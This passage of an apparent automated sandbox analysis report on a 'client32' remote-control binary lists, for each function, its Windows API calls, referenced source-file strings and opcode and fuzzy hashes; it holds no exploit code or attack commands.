                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CreateErrorExitImageLastList_MessageProcesswsprintf
                                                                              • String ID: ..\ctl32\imagelst.cpp$m_hImageList
                                                                              • API String ID: 756090014-1731862680
                                                                              • Opcode ID: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                              • Instruction ID: ed28c1bf2740c29e09f0e670a8a7b9fc6316d817cb7ee806623638b648209f33
                                                                              • Opcode Fuzzy Hash: 07d921ffa2181537d20c18b6818c9ba3a9d0b657febdfe7dc916a1ba0a5e0468
                                                                              • Instruction Fuzzy Hash: 50F062B1600719AFC320CF59D805A97B7E8EF98310B00852DF99AC3600D370E8508FA0
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSQuerySessionInformationA), ref: 11026234
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026261
                                                                              Strings
                                                                              • WTSQuerySessionInformationA, xrefs: 1102622E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSQuerySessionInformationA
                                                                              • API String ID: 199729137-4033149579
                                                                              • Opcode ID: baa88468955957b6059d11983daf5332bd6c471d9e11bd6bf7137641dae478ff
                                                                              • Instruction ID: 4c0ad6fd8419ebffd4c55594285f5a8fd2d3e56036ab3e38740d805351100f5e
                                                                              • Opcode Fuzzy Hash: baa88468955957b6059d11983daf5332bd6c471d9e11bd6bf7137641dae478ff
                                                                              • Instruction Fuzzy Hash: 8FF03A72A4062CAFD714DFA4D844E97B7E9FB48721F00861AF95997600D770E8108BA0
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 1102628C
                                                                              • SetLastError.KERNEL32(00000078), ref: 110262AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSFreeMemory
                                                                              • API String ID: 199729137-4124798068
                                                                              • Opcode ID: 530a1f113437d382cc4561dc9a8be7801c5ccfef9d809f7e8a4bd4cc1eb91108
                                                                              • Instruction ID: e97d27ce3b7ab54eb7811836018b8a0661f8d3204aa561733cbd10bce3554200
                                                                              • Opcode Fuzzy Hash: 530a1f113437d382cc4561dc9a8be7801c5ccfef9d809f7e8a4bd4cc1eb91108
                                                                              • Instruction Fuzzy Hash: 76F0EC72B427159FF7208F99E984745F7FCEF44722F10046AE951D3600C77468488BA0
                                                                              APIs
                                                                              • SetPropA.USER32(?,?,?), ref: 1115F395
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessPropwsprintf
                                                                              • String ID: ..\ctl32\wndclass.cpp$p->m_hWnd
                                                                              • API String ID: 1134434899-3115850912
                                                                              • Opcode ID: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction ID: 87c86bef28f98f72f88127ca4e69caffea3bfce03f9a6da2004c13aaf4101256
                                                                              • Opcode Fuzzy Hash: 538790263cfb1f25c099da663b992418a3413831744957c6e7e8603356e21433
                                                                              • Instruction Fuzzy Hash: FCF0E575BC0336B7D7509A66DC82FE6F358D722BA4F448016FC26A2141F274E980C2D2
                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,0000102D,00000000,?), ref: 11015229
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151F4
                                                                              • m_hWnd, xrefs: 110151F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 110173E4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11017409
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: QueueUserWorkItem
                                                                              • API String ID: 199729137-2469634949
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1109C06E
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                              • String ID: ..\ctl32\INFLATE.C$nbytes <= ID->e_outsize
                                                                              • API String ID: 1528188558-3285258354
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,SetupDiDestroyDeviceInfoList), ref: 110AA124
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,110AA38E,?), ref: 110AA141
                                                                              Strings
                                                                              • SetupDiDestroyDeviceInfoList, xrefs: 110AA11E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: SetupDiDestroyDeviceInfoList
                                                                              • API String ID: 199729137-2336592288
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,FlashWindowEx), ref: 1101D334
                                                                              • SetLastError.KERNEL32(00000078), ref: 1101D351
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: FlashWindowEx
                                                                              • API String ID: 199729137-2859592226
                                                                              APIs
                                                                              • IsWindow.USER32(?), ref: 1100213A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_pToolbar, xrefs: 11002155
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h, xrefs: 11002150
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\floatbar.h$m_pToolbar
                                                                              • API String ID: 2577986331-281161189
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110261F4
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: WTSFreeMemory
                                                                              • API String ID: 199729137-4124798068
                                                                              APIs
                                                                              • SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010C7
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010A1
                                                                              • m_hWnd, xrefs: 110010A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitItemLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2046328329-2830328467
                                                                              • Opcode ID: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction ID: 55addf44b20248d1cdc7b1377ce96882c1c4f69405d532d8ba5fa0b62c56eca9
                                                                              • Opcode Fuzzy Hash: c226bf07a577de758f5b5d732fabc6726861ac1fed5afbb268a848974a3c6e27
                                                                              • Instruction Fuzzy Hash: 8DE01AB661021DBFD714DE85EC81EEBB3ECEB49354F008529FA2A97240D6B0E850C7A5
                                                                              APIs
                                                                              • SendMessageA.USER32(?,?,?,?), ref: 11001083
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001061
                                                                              • m_hWnd, xrefs: 11001066
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 819365019-2830328467
                                                                              • Opcode ID: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction ID: 50f06fe94c134d50a88b9402c61dae4da10641179b5ac6344e644b67b4693846
                                                                              • Opcode Fuzzy Hash: 3c93d44872c95809d5d96296b6c43cba7727a5ea0dc913bc3fcb2418da055862
                                                                              • Instruction Fuzzy Hash: 6AE04FB5A00219BBD710DE95DC45EDBB3DCEB48354F00842AF92597240D6B0F84087A0
                                                                              APIs
                                                                              • PostMessageA.USER32(?,?,?,?), ref: 11001113
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1
                                                                              • m_hWnd, xrefs: 110010F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 906220102-2830328467
                                                                              • Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
                                                                              • Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
                                                                              • Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001203,?,?), ref: 11014161
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101413E
                                                                              • m_hWnd, xrefs: 11014143
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                              • Instruction ID: ce752b6915aa01a8741080b9e5a2c0ea08f5e284845c2bca3d31cce01905913c
                                                                              • Opcode Fuzzy Hash: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
                                                                              • Instruction Fuzzy Hash: 60E08675A502187BD310DA81DC46FD6F39CEB55755F008126F9255A241D670B8408790
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001014,?,?), ref: 110151D4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1
                                                                              • m_hWnd, xrefs: 110151B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
                                                                              • Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
                                                                              • Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001201,?,?), ref: 110141E1
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141BE
                                                                              • m_hWnd, xrefs: 110141C3
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                              • Instruction ID: e40b82f977eb721f415d7ce6a6c2c5c571fa6c694b71c8e0fe353644d2fc67f2
                                                                              • Opcode Fuzzy Hash: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
                                                                              • Instruction Fuzzy Hash: C6E0CD75A503187BD710DA81DC86FD7F39CDB54755F00C125FD2556640D670F950C790
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001204,?,?), ref: 11014261
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101423E
                                                                              • m_hWnd, xrefs: 11014243
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                              • Instruction ID: 55ae1fe25e9a5b1997f1acacac97235014ae2df67c49f839450db2036e8126b3
                                                                              • Opcode Fuzzy Hash: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
                                                                              • Instruction Fuzzy Hash: DDE086796502187BD3109A81DC46ED6F39CDB44765F00C125F9255A240D670B8408790
                                                                              APIs
                                                                              • SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201
                                                                              • m_hWnd, xrefs: 11017206
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                              • API String ID: 819365019-3966830984
                                                                              • Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
                                                                              • Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
                                                                              • Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001205,00000000,?), ref: 1101421F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141FE
                                                                              • m_hWnd, xrefs: 11014203
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                              • Instruction ID: 032d4df9316a5e8283d8688c6328372b319042290bc349747f778d43e7cc2059
                                                                              • Opcode Fuzzy Hash: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
                                                                              • Instruction Fuzzy Hash: B3E02B75B903287BD3209A81DC46FD7F39CDB04B55F004035F625AA581E6B1F450C794
                                                                              APIs
                                                                              • SendMessageA.USER32(?,00001202,?,00000000), ref: 1101429F
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101427E
                                                                              • m_hWnd, xrefs: 11014283
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                              • API String ID: 819365019-3507600817
                                                                              • Opcode ID: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                              • Instruction ID: 7bc1a9946e64f754710be5ebc9e77f2b7f227168eeca9689bda6582359b448ca
                                                                              • Opcode Fuzzy Hash: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
                                                                              • Instruction Fuzzy Hash: 30E0C275A50328BBD2209691DC46FD6F39C9B04755F008036F625AA181D6B0B8408694
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11026141
                                                                              • SetLastError.KERNEL32(00000078), ref: 11026157
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressErrorLastProc
                                                                              • String ID: SetProcessDPIAware
                                                                              • API String ID: 199729137-3477150623
                                                                              • Opcode ID: c27a12ae67aa8f4c73138461e800a71dd05296353ad8864271ee7e96fb39bf7f
                                                                              • Instruction ID: a0b8e5f83d4182f1424546049561e52e6892c7ed8099c53223f80ed2ed61eebf
                                                                              • Opcode Fuzzy Hash: c27a12ae67aa8f4c73138461e800a71dd05296353ad8864271ee7e96fb39bf7f
                                                                              • Instruction Fuzzy Hash: 1AE0C231D412348FD7209FB8FC08786B7F4AF08715F02046AE991D3A44C730A8408B80
                                                                              APIs
                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 11016198
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • m_hImageList, xrefs: 11016182
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 1101617D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitIconImageLastList_MessageProcessReplacewsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                              • API String ID: 2426217062-4007669474
                                                                              • Opcode ID: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                              • Instruction ID: 8e65b7ad63f8a8bd737c5e548218eb9c2c83e8f30b1cb0f0ee6871e24481aec6
                                                                              • Opcode Fuzzy Hash: 5113717a35f8a1ec747186b26df29046b32877a8f349f41facf259b61c2aef29
                                                                              • Instruction Fuzzy Hash: B8D02B756402297BC3108A88DC01FD5F38CCF15371F040336F961522C0D9B0A4408B94
                                                                              APIs
                                                                              • ShowWindow.USER32(?,?), ref: 1100114B
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001131
                                                                              • m_hWnd, xrefs: 11001136
                                                                              Memory Dump Source
